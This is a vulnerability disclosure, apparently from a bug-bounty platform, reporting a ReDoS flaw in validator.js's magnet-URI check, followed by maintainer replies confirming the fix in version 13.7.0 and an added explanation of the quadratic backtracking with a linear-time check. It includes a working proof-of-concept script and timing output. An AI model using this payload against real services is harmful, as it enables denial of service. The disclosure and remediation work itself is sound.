Inefficient Regular Expression Complexity in validatorjs/validator.js
Reported on
Sep 17th 2021
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It can cause a denial of service when validating crafted invalid MagnetURIs.
The ReDoS vulnerability is mainly due to the sub-pattern .+&tr=.+ with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator");
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  // Valid-looking prefix, then i*10000 copies of "&tr=" and a trailing line break that forces the match to fail
  var attack_str = 'magnet:?xt=urn:a:' + 'a'.repeat(32) + '&dn=' + '&tr='.repeat(i * 10000) + "\r\na\r\n";
  validator.isMagnetURI(attack_str);
  // Elapsed time for a single validation call
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
The Output
"attack_str.length: 40058: 464 ms"
"attack_str.length: 80058: 1717 ms"
"attack_str.length: 120058: 3864 ms"
"attack_str.length: 160058: 6871 ms"
"attack_str.length: 200058: 10895 ms"
"attack_str.length: 240058: 15493 ms"
Occurrences
SECURITY.md
2 years ago
Thank you Yeting Li for reporting this ReDOS. A fix has been submitted and is awaiting merge!
Hi, Sarhan, thank you for your confirmation. And I just checked that the fixed regex is safe.
Same here! Once we have confirmed the fix, we can go ahead and publish a CVE on your behalf.
Thanks! 🎊
@yetingli - thanks for the comment, we no longer assign CVEs to Inefficient Regular Expression Complexity.
We are doing this for our own internal quality and vetting process on reports before disclosing publicly via CVE.
Thank you guys! We finally released the fix in validator 13.7.0.
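Why the sub-pattern named in the report costs quadratic time, and a single-pass check that accepts the same strings, as an added example that is not part of the original report and is not validator.js code or its fix. The `^`/`$` anchoring, the step-counting model and the names `backtrackingSteps`, `linearCheck` and `sample` are assumptions made for illustration.

```javascript
// Added illustration (not validator.js code). REPORTED is the sub-pattern from
// the report, anchored here with ^ and $ as an assumption for the model.
const REPORTED = /^.+&tr=.+$/;

// "." in JavaScript does not match these line terminators.
const isDot = (c) => !"\n\r\u2028\u2029".includes(c);

// Simplified model of a backtracking engine evaluating REPORTED.
// Returns whether it matches and how many character steps were spent.
function backtrackingSteps(s) {
  let steps = 0;
  let end1 = 0;
  // First .+ is greedy: run up to the first line terminator.
  while (end1 < s.length && isDot(s[end1])) { end1++; steps++; }
  // Then give back one character at a time, looking for "&tr=".
  for (let i = end1; i >= 1; i--) {
    steps++;
    if (!s.startsWith("&tr=", i)) continue;
    // Second .+ greedily rescans the rest of the line ...
    let j = i + 4;
    while (j < s.length && isDot(s[j])) { j++; steps++; }
    // ... and backtracks, testing "$" at each shorter length.
    for (let k = j; k > i + 4; k--) {
      steps++;
      if (k === s.length) return { matched: true, steps };
    }
  }
  return { matched: false, steps };
}

// Single-pass check that accepts exactly the same strings as REPORTED.
function linearCheck(s) {
  if (/[\n\r\u2028\u2029]/.test(s)) return false; // "." must cover the whole input
  const i = s.indexOf("&tr=", 1);                 // at least one char before it
  return i !== -1 && i + 4 < s.length;            // at least one char after it
}

// Constructed input with the shape used in the report: n copies of "&tr="
// followed by a line terminator that makes every attempt fail.
const sample = (n) => "x" + "&tr=".repeat(n) + "\r\n";

for (const n of [100, 200, 400]) {
  const { matched, steps } = backtrackingSteps(sample(n));
  console.log(`n=${n} matched=${matched} modelSteps=${steps} linear=${linearCheck(sample(n))}`);
}
```

In the model, each of the n `&tr=` positions triggers a rescan of the remaining line, so the step count is 4n² + 4n + 2 and doubling the input roughly quadruples the work, the same growth seen in the report's timings.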